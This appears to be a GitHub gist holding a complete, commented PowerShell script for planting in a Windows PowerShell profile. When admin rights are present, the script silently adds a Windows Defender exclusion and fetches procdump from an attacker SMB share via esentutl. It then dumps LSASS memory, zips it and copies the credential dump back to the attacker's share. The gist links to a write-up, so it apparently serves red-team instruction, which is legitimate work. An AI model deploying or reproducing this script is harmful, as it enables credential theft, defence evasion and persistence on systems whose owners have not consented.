Skip to content

Instantly share code, notes, and snippets.

@tokyoneon
Created November 16, 2020 17:07
Show Gist options
  • Save tokyoneon/623d5b63a7b0588fae0104f226687d67 to your computer and use it in GitHub Desktop.
Save tokyoneon/623d5b63a7b0588fae0104f226687d67 to your computer and use it in GitHub Desktop.
exfil LSASS dump via Microsoft.PowerShell_profile.ps1
# write-up: https://www.varonis.com/blog/author/tokyoneon/
# an if statement to prevent the attack from executing without administrator privileges
if (whoami /groups | findstr /i "S-1-16-12288")
{
# start the attack as a background processs to prevent the PS terminal from stalling when opened
Start-Job {
# where to write data during the attack?
$temp = "$env:TEMP"
# create path exclusion in Windows Defender to prevent procdump detection
Add-MpPreference -ExclusionPath $temp
# sleep several seconds to allow the path exclusion to take effect
Start-Sleep -s 4
# the attacker's IP address
$server = "192.168.56.101"
# the attacker's SMB share name, must match impacket-smbserver share name
$share = "evilshare"
# procdump filename as it appears on the attacker's SMB share
$procdump = "procdump.exe"
# procdump.exe is saved locally with a random string as the filename
$filename = (-join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object { [char]$_ })) + '.exe'
# the procdump output path when saved locally; shameless username plug
$dump = "tokyoneon.dmp"
# as the procdump output contains non-ascii characters, it must be compressed before exfiltrating
$exfil = "$env:COMPUTERNAME-$env:USERNAME-lsass.zip"
# rather than use invoke-webrequest, use an alternate LOLBAS for file retrieval
esentutl.exe /y \\$server\$share\$procdump /d $temp\$filename /o
# execute procdump and dump LSASS memory
& $temp\$filename -accepteula -ma lsass.exe $temp\$dump
# suppress progress bar that appears in the terminal when compressing the dump
$ProgressPreference = "SilentlyContinue"
# compress the dump
Compress-Archive -Path $temp\$dump -DestinationPath $temp\$exfil -Force
# exfiltrate the compressed dump to the attacker's SMB share via cp
cp $temp\$exfil \\$server\$share\$exfil } | Out-Null
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment